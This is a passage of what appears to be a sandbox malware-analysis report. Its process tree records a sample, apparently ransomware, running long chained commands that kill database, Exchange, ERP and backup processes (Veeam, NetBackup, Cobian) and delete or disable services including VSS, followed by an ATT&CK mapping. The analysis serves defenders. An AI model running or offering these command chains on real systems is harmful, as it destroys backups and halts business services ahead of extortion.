  2⤵
  PID:1028
- C:\Windows\system32\sc.exe
  sc delete MSSQLSERVER
  2⤵
  PID:1100
- C:\Windows\system32\sc.exe
  sc delete TeamViewer
  2⤵
  PID:2000
- C:\Windows\system32\sc.exe
  sc delete ReportServer
  2⤵
  PID:1716
- C:\Windows\system32\sc.exe
  sc delete MSDTC
  2⤵
  PID:1464
- C:\Windows\system32\sc.exe
  sc delete RabbitMQ
  2⤵
  PID:276
- C:\Windows\system32\sc.exe
  sc delete "AHS SERVICE"
  2⤵
  PID:1464
- C:\Windows\system32\sc.exe
  sc delete "Sense Shield Service"
  2⤵
  PID:2000
- C:\Windows\system32\sc.exe
  sc delete SSMonitorService
  2⤵
  PID:996
- C:\Windows\system32\sc.exe
  sc delete MSSQL$SQL2008
  2⤵
  PID:1548
- C:\Windows\system32\sc.exe
  sc delete SQLAgent$SQL2008
  2⤵
  PID:920
- C:\Windows\system32\sc.exe
  sc delete "OSP Service"
  2⤵
  PID:1928
- C:\Windows\system32\sc.exe
  sc delete "FontCache3.0.0.0"
  2⤵
  PID:1780
- C:\Windows\system32\sc.exe
  sc delete LMS
  2⤵
  PID:1116
- C:\Windows\system32\sc.exe
  sc delete jhi_service
  2⤵
  PID:2020
- C:\Windows\system32\sc.exe
  sc delete VirboxWebServer
  2⤵
  PID:1600
- C:\Windows\system32\sc.exe
  sc delete TPlusStdUpgradeService1300
  2⤵
  PID:1724
- C:\Windows\system32\sc.exe
  sc delete TPlusStdTaskService1300
  2⤵
  PID:2036
- C:\Windows\system32\sc.exe
  sc delete TPlusStdAppService1300
  2⤵
  PID:1568
- C:\Windows\system32\sc.exe
  sc delete SSSyncService
  2⤵
  PID:1616
- C:\Windows\system32\sc.exe
  sc delete VGAuthService
  2⤵
  PID:524
- C:\Windows\system32\sc.exe
  sc delete VMTools
  2⤵
  PID:2016
- C:\Windows\system32\sc.exe
  sc delete MSSQLServerOLAPService
  2⤵
  PID:1568
- C:\Windows\system32\sc.exe
  sc delete QcSoftService
  2⤵
  PID:308
- C:\Windows\system32\sc.exe
  sc delete SQLBrowser
  2⤵
  PID:1724

C:\Windows\system32\taskkill.exe
taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1220

C:\Windows\system32\cmd.exe
cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowEngine"
1⤵
- Suspicious use of WriteProcessMemory
PID:1760
- C:\Windows\system32\taskkill.exe
  taskkill /IM DDSoftPwsTomcat9.exe /F
  2⤵
  - Kills process with taskkill
  PID:564
- C:\Windows\system32\taskkill.exe
  taskkill /IM U8SmartClient.exe /F
  2⤵
  - Kills process with taskkill
  PID:1592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLWriter
    3⤵
    PID:1400
- C:\Windows\system32\taskkill.exe
  taskkill /IM U8SmartClientMonitor.exe /F
  2⤵
  PID:1092
- C:\Windows\system32\taskkill.exe
  taskkill /IM tomcat9.exe /F
  2⤵
  - Kills process with taskkill
  PID:1596
- C:\Windows\system32\taskkill.exe
  taskkill /IM SqlManagement.exe /F
  2⤵
  PID:1708
- - C:\Windows\system32\sc.exe
    sc delete OracleVssWriterORCL
    3⤵
    PID:1208
- C:\Windows\system32\taskkill.exe
  taskkill /IM ReportingServicesService.exe /F
  2⤵
  - Kills process with taskkill
  PID:436
- C:\Windows\system32\sc.exe
  sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai"
  2⤵
  PID:1996
- C:\Windows\system32\sc.exe
  sc delete "ReportServer$SQLEXPRESS"
  2⤵
  PID:928
- C:\Windows\system32\sc.exe
  sc delete TongBackupSrv
  2⤵
  PID:1708
- C:\Windows\system32\taskkill.exe
  taskkill /IM TongBackupSrv.exe /F
  2⤵
  - Kills process with taskkill
  PID:1504
- C:\Windows\system32\taskkill.exe
  taskkill /IM UFMsgCenterService.exe /F
  2⤵
  - Kills process with taskkill
  PID:804
- C:\Windows\system32\taskkill.exe
  taskkill /IM "Cobian.exe" /F
  2⤵
  - Kills process with taskkill
  PID:1828
- C:\Windows\system32\taskkill.exe
  taskkill /IM "SAP Business One.exe" /F
  2⤵
  - Kills process with taskkill
  PID:960
- C:\Windows\system32\net.exe
  net stop "SQLBackupAndFTP Client Service"
  2⤵
  PID:1684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SQLBackupAndFTP Client Service"
    3⤵
    PID:1580
- C:\Windows\system32\taskkill.exe
  taskkill /IM "SqlBak.Service.exe" /F
  2⤵
  PID:1636
- C:\Windows\system32\net.exe
  net stop cbVSCService
  2⤵
  PID:1544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop cbVSCService
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1860
- C:\Windows\system32\net.exe
  net stop "SAP Business One RSP Agent Service"
  2⤵
  PID:524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SAP Business One RSP Agent Service"
    3⤵
    PID:952
- C:\Windows\system32\net.exe
  net stop SAPB1iDIProxy
  2⤵
  PID:1016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAPB1iDIProxy
    3⤵
    PID:1980
- C:\Windows\system32\net.exe
  net stop "SAPB1iDIProxy_Monitor"
  2⤵
  PID:1768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SAPB1iDIProxy_Monitor"
    3⤵
    PID:928
- C:\Windows\system32\net.exe
  net stop SAPB1iEventSender
  2⤵
  PID:1888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAPB1iEventSender
    3⤵
    PID:1796
- C:\Windows\system32\net.exe
  net stop SBOClientAgent
  2⤵
  PID:556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SBOClientAgent
    3⤵
    PID:1348
- C:\Windows\system32\net.exe
  net stop SBODI_Server
  2⤵
  PID:564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SBODI_Server
    3⤵
    PID:896
- C:\Windows\system32\net.exe
  net stop SBOJobServiceBackEnd
  2⤵
  PID:956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SBOJobServiceBackEnd
    3⤵
    PID:528
- C:\Windows\system32\net.exe
  net stop SBOMail
  2⤵
  PID:1600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SBOMail
    3⤵
    PID:1516
- C:\Windows\system32\net.exe
  net stop SBOWFDataAccess
  2⤵
  PID:996
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SBOWFDataAccess
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1028
- C:\Windows\system32\net.exe
  net stop SBOWorkflowEngine
  2⤵
  PID:1628
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SBOWorkflowEngine
    3⤵
    PID:288

C:\Windows\system32\net.exe
net stop MSSQLSERVER
1⤵
PID:1720

C:\Windows\system32\cmd.exe
cmd /c "color b & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkill /IM mpdwsvc.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete CobianBackup11 & @sc delete cbVSCService11 & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F & taskkill /F /IM store.exe & taskkill /F /IM MSExchangeMailboxReplication.exe & taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe & taskkill /F /IM MSExchangeThrottling.exe & taskkill /F /IM EdgeTransport.exe & taskkill /F /IM MSExchangeTransportLogSearch.exe & taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe & taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe & taskkill /F /IM DataCollectorSvc.exe & taskkill /F /IM Microsoft.Exchange.ServiceHost.exe & taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe & taskkill /F /IM MSExchangeMailboxAssistants.exe & taskkill /F /IM msexchangerepl.exe & taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe & taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe & taskkill /F /IM MsExchangeFDS.exe & taskkill /F /IM MSExchangeMailSubmission.exe & taskkill /F /IM MSExchangeTransport.exe & taskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1772
- C:\Windows\system32\taskkill.exe
  taskkill /IM Tomcat7w.exe /F
  2⤵
  - Kills process with taskkill
  PID:1860
- C:\Windows\system32\taskkill.exe
  taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
  2⤵
  - Kills process with taskkill
  PID:556
- C:\Windows\system32\taskkill.exe
  taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F
  2⤵
  PID:288
- C:\Windows\system32\taskkill.exe
  taskkill /IM Launchpad.exe /F
  2⤵
  - Kills process with taskkill
  PID:1592
- C:\Windows\system32\taskkill.exe
  taskkill /IM mpdwsvc.exe /F
  2⤵
  - Kills process with taskkill
  PID:1460
- C:\Windows\system32\taskkill.exe
  taskkill /IM cbVSCService11.exe /F
  2⤵
  - Kills process with taskkill
  PID:1828
- C:\Windows\system32\taskkill.exe
  taskkill /IM cbService.exe /F
  2⤵
  - Kills process with taskkill
  PID:564
- C:\Windows\system32\sc.exe
  sc delete CobianBackup11
  2⤵
  PID:1588
- C:\Windows\system32\sc.exe
  sc delete cbVSCService11
  2⤵
  PID:1924
- C:\Windows\system32\taskkill.exe
  taskkill /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:1860
- C:\Windows\system32\taskkill.exe
  taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F
  2⤵
  - Kills process with taskkill
  PID:1792
- C:\Windows\system32\taskkill.exe
  taskkill /IM sqlceip.exe /F
  2⤵
  - Kills process with taskkill
  PID:1928
- C:\Windows\system32\taskkill.exe
  taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F
  2⤵
  - Kills process with taskkill
  PID:1604
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM store.exe
  2⤵
  - Kills process with taskkill
  PID:960
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSExchangeMailboxReplication.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:564
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe
  2⤵
  - Kills process with taskkill
  PID:1084
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSExchangeThrottling.exe
  2⤵
  - Kills process with taskkill
  PID:1612
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM EdgeTransport.exe
  2⤵
  PID:1604
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSExchangeTransportLogSearch.exe
  2⤵
  - Kills process with taskkill
  PID:1460
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe
  2⤵
  - Kills process with taskkill
  PID:952
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe
  2⤵
  - Kills process with taskkill
  PID:1764
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM DataCollectorSvc.exe
  2⤵
  - Kills process with taskkill
  PID:1076
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Microsoft.Exchange.ServiceHost.exe
  2⤵
  - Kills process with taskkill
  PID:1352
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe
  2⤵
  PID:1996
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSExchangeMailboxAssistants.exe
  2⤵
  - Kills process with taskkill
  PID:1688
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM msexchangerepl.exe
  2⤵
  - Kills process with taskkill
  PID:804
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe
  2⤵
  - Kills process with taskkill
  PID:1580
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe
  2⤵
  - Kills process with taskkill
  PID:1928
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MsExchangeFDS.exe
  2⤵
  PID:1840
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MSExchangeMailSubmission.exe
  2⤵
  - Kills process with taskkill
  PID:1588

C:\Windows\system32\cmd.exe
cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1736
- C:\Windows\system32\net.exe
  net stop "MSSQL$SHOPCONTROL9"
  2⤵
  PID:1548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$SHOPCONTROL9"
    3⤵
    PID:688
- C:\Windows\system32\net.exe
  net stop "MSSQLFDLauncher$SHOPCONTROL9"
  2⤵
  PID:1484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHOPCONTROL9"
    3⤵
    PID:396
- C:\Windows\system32\net.exe
  net stop "NetBackup Legacy Network Service"
  2⤵
  PID:1724
- C:\Windows\system32\net.exe
  net stop "NetBackup Proxy Service"
  2⤵
  PID:584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "NetBackup Proxy Service"
    3⤵
    PID:1984
- C:\Windows\system32\net.exe
  net stop "NetBackup SAN Client Fibre Transport Service"
  2⤵
  PID:1548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "NetBackup SAN Client Fibre Transport Service"
    3⤵
    PID:308
- C:\Windows\system32\taskkill.exe
  taskkill /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  PID:1636
- C:\Windows\system32\taskkill.exe
  taskkill /IM NFVPrint.exe /F
  2⤵
  PID:1460
- C:\Windows\system32\taskkill.exe
  taskkill /IM licenceserver.exe /F
  2⤵
  - Kills process with taskkill
  PID:1924
- C:\Windows\system32\net.exe
  net stop "NetBackup Legacy Client Service"
  2⤵
  PID:1376
- C:\Windows\system32\taskkill.exe
  taskkill /IM Launchpad.exe /F
  2⤵
  PID:1532
- C:\Windows\system32\net.exe
  net stop "NetBackup Discovery Framework"
  2⤵
  PID:1588
- C:\Windows\system32\net.exe
  net stop "NetBackup Client Service"
  2⤵
  PID:820
- C:\Windows\system32\net.exe
  net stop "SQLAgent$SHOPCONTROL9"
  2⤵
  PID:1348
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM "FileZilla Server.exe"
  2⤵
  PID:1636
- C:\Windows\system32\net.exe
  net stop "ReportServer$SHOPCONTROL9"
  2⤵
  PID:1796
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM cbService.exe
  2⤵
  - Kills process with taskkill
  PID:1632
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM cbInterface.exe
  2⤵
  - Kills process with taskkill
  PID:1092
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM pvxwin32.exe
  2⤵
  - Kills process with taskkill
  PID:976
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM pvxwin64.exe
  2⤵
  - Kills process with taskkill
  PID:1580
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM pvxcom.exe
  2⤵
  - Kills process with taskkill
  PID:928
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM pvxiosvr.exe
  2⤵
  - Kills process with taskkill
  PID:964
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Sage.NA.AT_AU.SysTray.exe
  2⤵
  - Kills process with taskkill
  PID:1556
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Sage.NA.AT_AU.Service.exe
  2⤵
  - Kills process with taskkill
  PID:976

C:\Windows\system32\cmd.exe
cmd /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /IM Veeam.Backup.CloudService.exe & taskkill /F /IM Veeam.Backup.Manager.exe & taskkill /F /IM Veeam.Backup.MountService.exe & taskkill /F /IM Veeam.Backup.Service.exe & taskkill /F /IM Veeam.Backup.WmiServer.exe & taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe & taskkill /F /IM VeeamDeploymentSvc.exe & taskkill /F /IM VeeamNFSSvc.exe & taskkill /F /IM VeeamTransportSvc.exe & taskkill /F /IM sqlbrowser.exe & taskkill /F /IM sqlceip.exe & taskkill /F /IM sqlservr.exe & taskkill /F /IM sqlwriter.exe & taskkill /F /IM sqlagentc.exe & taskkill /F /IM ReportingServicesService.exe & taskkill /F /IM Ssms.exe & taskkill /F /IM fdhost.exe & taskkill /F /IM fdlauncher.exe & taskkill /F /IM MsDtsSrvr.exe & taskkill /F /IM msmdsrv.exe & taskkill /F /IM mysql.exe & taskkill /F /IM mysqld.exe & taskkill /F /IM w3wp.exe & taskkill /F /IM wsusservice.exe & taskkill /F /IM SageCSClient.exe & taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe & taskkill /F /IM Launchpad.exe & taskkill /F /IM dbsrv12.exe & taskkill /F /IM EXCEL.EXE & taskkill /F /IM OUTLOOK.EXE & taskkill /F /IM WINWORD.EXE & taskkill /F /IM OneDrive.exe & taskkill /F /IM TaskService.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2008
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Veeam.Backup.BrokerService.exe
  2⤵
  - Kills process with taskkill
  PID:1548
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Veeam.Backup.CatalogDataService.exe
  2⤵
  - Kills process with taskkill
  PID:1816
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Veeam.Backup.CloudService.exe
  2⤵
  - Kills process with taskkill
  PID:1768
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Veeam.Backup.Manager.exe
  2⤵
  - Kills process with taskkill
  PID:524
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Veeam.Backup.MountService.exe
  2⤵
  - Kills process with taskkill
  PID:1684
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Veeam.Backup.Service.exe
  2⤵
  - Kills process with taskkill
  PID:1888
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Veeam.Backup.WmiServer.exe
  2⤵
  - Kills process with taskkill
  PID:1636
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe
  2⤵
  - Kills process with taskkill
  PID:1816
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM VeeamDeploymentSvc.exe
  2⤵
  PID:1692
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM VeeamNFSSvc.exe
  2⤵
  - Kills process with taskkill
  PID:1600
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM VeeamTransportSvc.exe
  2⤵
  PID:1096
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM sqlbrowser.exe
  2⤵
  - Kills process with taskkill
  PID:436
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM sqlceip.exe
  2⤵
  - Kills process with taskkill
  PID:556
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM sqlservr.exe
  2⤵
  PID:540
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM sqlwriter.exe
  2⤵
  - Kills process with taskkill
  PID:1996
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM sqlagentc.exe
  2⤵
  PID:1564
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM ReportingServicesService.exe
  2⤵
  - Kills process with taskkill
  PID:1580
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM Ssms.exe
  2⤵
  PID:1928
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM fdhost.exe
  2⤵
  - Kills process with taskkill
  PID:956
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM fdlauncher.exe
  2⤵
  - Kills process with taskkill
  PID:696
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM MsDtsSrvr.exe
  2⤵
  - Kills process with taskkill
  PID:1084
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM msmdsrv.exe
  2⤵
  PID:1844
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM mysql.exe
  2⤵
  - Kills process with taskkill
  PID:1632
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM mysqld.exe
  2⤵
  - Kills process with taskkill
  PID:1684
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM w3wp.exe
  2⤵
  - Kills process with taskkill
  PID:1736
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM wsusservice.exe
  2⤵
  - Kills process with taskkill
  PID:1208
- C:\Windows\system32\taskkill.exe
  taskkill /F /IM SageCSClient.exe
  2⤵
  - Kills process with taskkill
  PID:280

C:\Windows\system32\cmd.exe
cmd /c "color b & net stop MSSQLSERVER & sc config MSSQLSERVER start=disabled & net stop "SQL Server (MSSQLSERVER)" & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP"
1⤵
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Windows\system32\sc.exe
  sc config "SQL Server (MSSQLSERVER)" start=disabled
  2⤵
  PID:1648
- C:\Windows\system32\net.exe
  net stop MSSQL$
  2⤵
  PID:308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$
    3⤵
    PID:1168
- C:\Windows\system32\sc.exe
  sc config MSSQL$ start=disabled
  2⤵
  PID:776
- C:\Windows\system32\net.exe
  net stop SQLBrowser
  2⤵
  PID:1592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLBrowser
    3⤵
    PID:2020
- C:\Windows\system32\net.exe
  net stop vmvss
  2⤵
  PID:268
- C:\Windows\system32\sc.exe
  sc config vmvss start=disabled
  2⤵
  PID:1596
- C:\Windows\system32\sc.exe
  sc config MSSQL$FE_EXPRESS start= disabled
  2⤵
  PID:1568
- C:\Windows\system32\net.exe
  net stop MSSQL$RE_EXPRESS
  2⤵
  PID:1208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$RE_EXPRESS
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1720
- C:\Windows\system32\sc.exe
  sc config SQLWriter start=disabled
  2⤵
  PID:672
- C:\Windows\system32\net.exe
  net stop SQLANYs_Sage_FAS_Fixed_Assets
  2⤵
  PID:1600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLANYs_Sage_FAS_Fixed_Assets
    3⤵
    PID:1984
- C:\Windows\system32\net.exe
  net stop MSSQL$VIM_SQLEXP
  2⤵
  PID:568
- C:\Windows\system32\sc.exe
  sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled
  2⤵
  PID:2036
- C:\Windows\system32\net.exe
  net stop SQLWriter
  2⤵
  PID:1592
- C:\Windows\system32\sc.exe
  sc config vss start=disabled
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:568
- C:\Windows\system32\net.exe
  net stop vss
  2⤵
  PID:276
- C:\Windows\system32\sc.exe
  sc config SQLBrowser start=disabled
  2⤵
  PID:1712
- C:\Windows\system32\sc.exe
  sc config SQLSERVERAGENT start=disabled
  2⤵
  PID:1596
- C:\Windows\system32\net.exe
  net stop SQLSERVERAGENT
  2⤵
  PID:1704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetBackup Client Service"
1⤵
PID:1928

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetBackup Legacy Network Service"
1⤵
PID:1584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vmvss
1⤵
PID:2016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetBackup Discovery Framework"
1⤵
PID:2020

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1732-2-0x000007FEFBD61000-0x000007FEFBD63000-memory.dmp

Filesize
8KB

Download
memory/1732-3-0x0000000140000000-0x000000014002C000-memory.dmp

Filesize
176KB

Download